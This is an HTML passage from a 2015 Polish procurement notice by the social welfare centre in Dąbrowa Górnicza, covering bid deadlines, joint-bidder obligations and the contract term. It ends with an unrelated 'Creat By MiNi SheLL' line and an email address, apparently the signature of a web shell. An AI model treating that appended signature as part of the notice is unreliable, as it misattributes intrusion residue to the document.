2. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony. 
3. Wszelkie zmiany i uzupełnienia  treści umowy mogą być dokonane wyłącznie w formie pisemnej  pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
Alei Józefa Piłsudskiego 2, 41-300 Dąbrowa Górnicza,I piętro, pok. nr  116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2015 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej
Alei Józefa Piłsudskiego 2, 41-300 Dąbrowa Górnicza,I piętro, pok. nr  116.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz 
w przypadku podmiotów na zasobach których, na zasadach określonych w art. 26 ust 2b ustawy Pzp polega Wykonawca, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty.
2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni spełniać warunki udziału w postępowaniu określone w rozdz. VI oraz złożyć dokumenty i oświadczenia potwierdzające spełnienie tych warunków, zgodnie z zapisami zawartymi w rozdz. VII SIWZ. 
3. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców do oferty muszą być załączone dokumenty i oświadczenia zawarte w rozdz. VII.2. przez każdego z Wykonawców  lub przez pełnomocnika  w imieniu każdego z nich. Dokument wymieniony w rozdz. VII. 3  SIWZ  każdy z Wykonawców składa oddzielnie. 
Oświadczenie wymienione w rozdz. VII.1.1 SIWZ winno być podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie na jednym druku przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
W odniesieniu do dokumentów i oświadczeń wskazanych w rozdz. VII.1.2 i VII.1.3 ,VII.1.4, SIWZ - jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokument ten składa przynajmniej jeden z nich.
Formularz ofertowy wymieniony w rozdz. VII.4.1 (Załącznik Nr 1 do SIWZ) winien być podpisany przez uprawnionych przedstawicieli Wykonawców.
4. Ponadto ww. Wykonawcy ustanowią pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu oraz przy zawarciu umowy (dotyczy również Spółki Cywilnej). Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.
5. Zgodnie z treścią art. 141 ustawy Pzp Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.
6. W przypadku, gdy z załączonych do oferty dokumentów nie wynika sposób reprezentacji Wykonawcy, przed podpisaniem umowy Zamawiający wymaga przedłożenia dokumentu (pełnomocnictwa) z którego wynika uprawnienie osoby lub osób do składania oświadczeń woli i reprezentowania Wykonawcy.
7. TERMIN WYKONANIA ZAMÓWIENIA -  12 miesięcy, tj.: Umowa zostaje zawarta na okres: od  01.01.2016 r.  do 31.12.2016 r. W przypadku wyczerpania środków zabezpieczonych na ten cel, tj. maksymalnej wartości zamówienia, umowa rozwiązuje się z dniem wyczerpania środków.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com